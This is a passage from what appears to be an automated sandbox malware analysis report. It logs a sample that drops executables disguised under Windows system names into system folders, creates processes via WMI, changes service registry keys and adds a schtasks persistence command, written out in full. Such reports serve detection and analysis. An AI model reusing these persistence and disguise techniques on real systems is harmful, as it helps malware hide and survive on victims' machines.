              Source: WmiPrvSE.exe.4.drStatic PE information: section name: .text entropy: 7.45249791422668
              Source: Idle.exe.4.drStatic PE information: section name: .text entropy: 7.45249791422668
              Source: lmXqPxTfNHomnnafzTOKZnFns.exe0.4.drStatic PE information: section name: .text entropy: 7.45249791422668
              Source: upfc.exe.4.drStatic PE information: section name: .text entropy: 7.45249791422668
              Source: lmXqPxTfNHomnnafzTOKZnFns.exe1.4.drStatic PE information: section name: .text entropy: 7.45249791422668
              Source: lmXqPxTfNHomnnafzTOKZnFns.exe2.4.drStatic PE information: section name: .text entropy: 7.45249791422668
              Source: lmXqPxTfNHomnnafzTOKZnFns.exe3.4.drStatic PE information: section name: .text entropy: 7.45249791422668
              Source: WinStore.App.exe.4.drStatic PE information: section name: .text entropy: 7.45249791422668
              Source: lmXqPxTfNHomnnafzTOKZnFns.exe4.4.drStatic PE information: section name: .text entropy: 7.45249791422668
              Source: lmXqPxTfNHomnnafzTOKZnFns.exe5.4.drStatic PE information: section name: .text entropy: 7.45249791422668

              Persistence and Installation Behavior

              barindex
              Creates processes via WMI
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeFile created: C:\Recovery\upfc.exeJump to dropped file
              Source: C:\ProgramData\ssh\System.exeFile created: C:\Recovery\Idle.exeJump to dropped file
              Source: C:\ProgramData\ssh\System.exeFile created: C:\Recovery\lmXqPxTfNHomnnafzTOKZnFns.exeJump to dropped file
              Source: C:\ProgramData\ssh\System.exeFile created: C:\Users\Default\lmXqPxTfNHomnnafzTOKZnFns.exeJump to dropped file
              Source: C:\ProgramData\ssh\System.exeFile created: C:\Windows\TAPI\lmXqPxTfNHomnnafzTOKZnFns.exeJump to dropped file
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeFile created: C:\ProgramData\ssh\System.exeJump to dropped file
              Source: C:\ProgramData\ssh\System.exeFile created: C:\Users\Default\AppData\Roaming\lmXqPxTfNHomnnafzTOKZnFns.exeJump to dropped file
              Source: C:\ProgramData\ssh\System.exeFile created: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\WmiPrvSE.exeJump to dropped file
              Source: C:\ProgramData\ssh\System.exeFile created: C:\Program Files (x86)\Windows Sidebar\lmXqPxTfNHomnnafzTOKZnFns.exeJump to dropped file
              Source: C:\ProgramData\ssh\System.exeFile created: C:\Program Files\Windows Defender\lmXqPxTfNHomnnafzTOKZnFns.exeJump to dropped file
              Source: C:\ProgramData\ssh\System.exeFile created: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeJump to dropped file
              Source: C:\ProgramData\ssh\System.exeFile created: C:\Windows\LiveKernelReports\WinStore.App.exeJump to dropped file
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeFile created: C:\ProgramData\ssh\System.exeJump to dropped file
              Source: C:\ProgramData\ssh\System.exeFile created: C:\Users\Default\lmXqPxTfNHomnnafzTOKZnFns.exeJump to dropped file
              Source: C:\ProgramData\ssh\System.exeFile created: C:\Windows\TAPI\lmXqPxTfNHomnnafzTOKZnFns.exeJump to dropped file
              Source: C:\ProgramData\ssh\System.exeFile created: C:\Windows\LiveKernelReports\WinStore.App.exeJump to dropped file

              Boot Survival

              barindex
              Drops PE files to the user root directory
              Source: C:\ProgramData\ssh\System.exeFile created: C:\Users\Default\lmXqPxTfNHomnnafzTOKZnFns.exeJump to dropped file
              Uses schtasks.exe or at.exe to add and modify task schedules
              Source: C:\ProgramData\ssh\System.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\lmXqPxTfNHomnnafzTOKZnFns.exe'" /f
              Source: C:\Recovery\Idle.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\MSDTC Bridge 3.0.0.0\LinkageJump to behavior
              Source: C:\Recovery\Idle.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\.NET Memory Cache 4.0\LinkageJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\ssh\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\ssh\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\ssh\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\ssh\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\ssh\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\ssh\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\ssh\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\ssh\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\ssh\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\ssh\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\ssh\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\ssh\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\ssh\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\ssh\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\ssh\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\ssh\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\ssh\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\ssh\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\ssh\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\ssh\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\ssh\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\ssh\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\ssh\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\ssh\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\ssh\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\ssh\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\ssh\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\ssh\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\ssh\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\ssh\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\ssh\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\ssh\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\ssh\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\ssh\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\ssh\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\ssh\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\ssh\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\ssh\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\ssh\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\ssh\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\ssh\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\ssh\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\ssh\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\ssh\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\ssh\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\ssh\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\ssh\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\ssh\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\ssh\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\ssh\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Recovery\Idle.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
